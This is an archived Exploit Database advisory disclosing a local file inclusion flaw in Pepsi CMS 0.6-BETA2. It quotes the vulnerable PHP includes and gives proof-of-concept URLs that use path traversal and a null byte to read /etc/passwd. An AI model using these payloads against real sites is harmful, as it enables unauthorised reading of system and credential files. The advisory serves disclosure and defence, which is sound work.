Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 – Multiple Local File

• Exploit Database
• 12 阅读

• 作者： eidelweiss
  日期： 2010-03-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11938/

• ########################################################
  	Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 Multiple Local File Vulnerability
  ########################################################
  
  	fucking the Web Apps [LFI #1 - attack edition 
  
   __________
  /\_`\ /\ \__/\ \__/\ \ 
  \ \ \L\_\_______\ \ \/'\ /\_\_____\ \ ,_\ \ \_____ 
   \ \_\/\ \/\ \/'___\ \ , < \/\ \ /' _ `\/'_ `\ \ \ \/\ \_ `\/'__`\ 
  \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\__/ 
   \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
  \/_/\/___/\/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
  /\____/
  \_/__/ 
   ____________ Hack0wn! Security Project 
  /\ \__/\ \/\ \/\_\ 
  \ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \_____ _____ ____
   \ \ \ \ \ \ \/'__`\ \ '__`\ \ \__ \/\ '__`\/\ '__`\/',__\ 
  \ \ \_/ \_\ \/\__/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
   \ `\___x___/\ \____\\ \_,__/\ \_\ \_\ \ ,__/\ \ ,__/\/\____/
  '\/__//__/\/____/ \/___/\/_/\/_/\ \ \/\ \ \/\/___/ 
   \ \_\ \ \_\ 
  \/_/\/_/ 
  
  
  [+]Software:	Pepsi CMS (Irmin CMS)
  [+]Version:	pepsi-0.6-BETA2
  [+]License:	GNU/GPL
  [+]Source:	http://sourceforge.net/projects/pepsicms/files/
  [+]Risk:		High
  [+]CWE:		CWE-22
  [+]Local:		Yes
  [+]Remote:	No
  
  ########################################################
  
  [!] Discovered :	eidelweiss
  [!] Contact :	eidelweiss[at]cyberservices[dot]com
  [!] Thank`s :	sp3x (securityreason) - r0073r & 0x1D (inj3ct0r) loneferret - Exploits - dookie2000ca (exploit-db)
  [!] Special To :	JosS (hack0wn) - g1xx_achmed - [D]eal [C]yber - Syabilla_putri (i miss u so much to)
  
  ########################################################
  
  -=[Description]=-
  
  	IrminCMS is a CMS (Content Management System) extensible and secure written in php
  	Pepsi CMS is become of IrminCMS.
  
  
  -=[ Vuln c0de ]=-
  ###############
  	{index.php}
  ###############
  
  <?php
  if(!file_exists(".lock")) {
  	$f = fopen(".basepath", "w");
  	fwrite($f, "<?php define('BASEPATH', '".$_SERVER['DOCUMENT_ROOT']."'); ?>");
  	fclose($f);
  	fclose(fopen(".lock", "w"));
  }
  
  include (".basepath");
  include ("config.php");
  
  //very sweet
  include "includes/template-loader.php";
  
  
  
  ###############
  	{includes/template-loader.php}
  ###############
  
  	include( 'config.php' );
  	include( 'db.php' );
  	//include( 'classes/theme_engine/engine.php' );
  	include( $_Root_Path . 'classes/Smarty.class.php' );
  
  ########################################################
  
  -=[ P0C ]=-
  
  	Http://127.0.0.1/PATH/index.php?w=[LFI%]
  
  	Http://127.0.0.1/PATH/includes/template-loader.php?_Root_Path=../../../../../../../../../etc/passwd%00
  
  	
  ########################################################
  
  Similar reference informed by Packetstorm Security:
  http://packetstormsecurity.org/0808-exploits/pepsicms-rfi.txt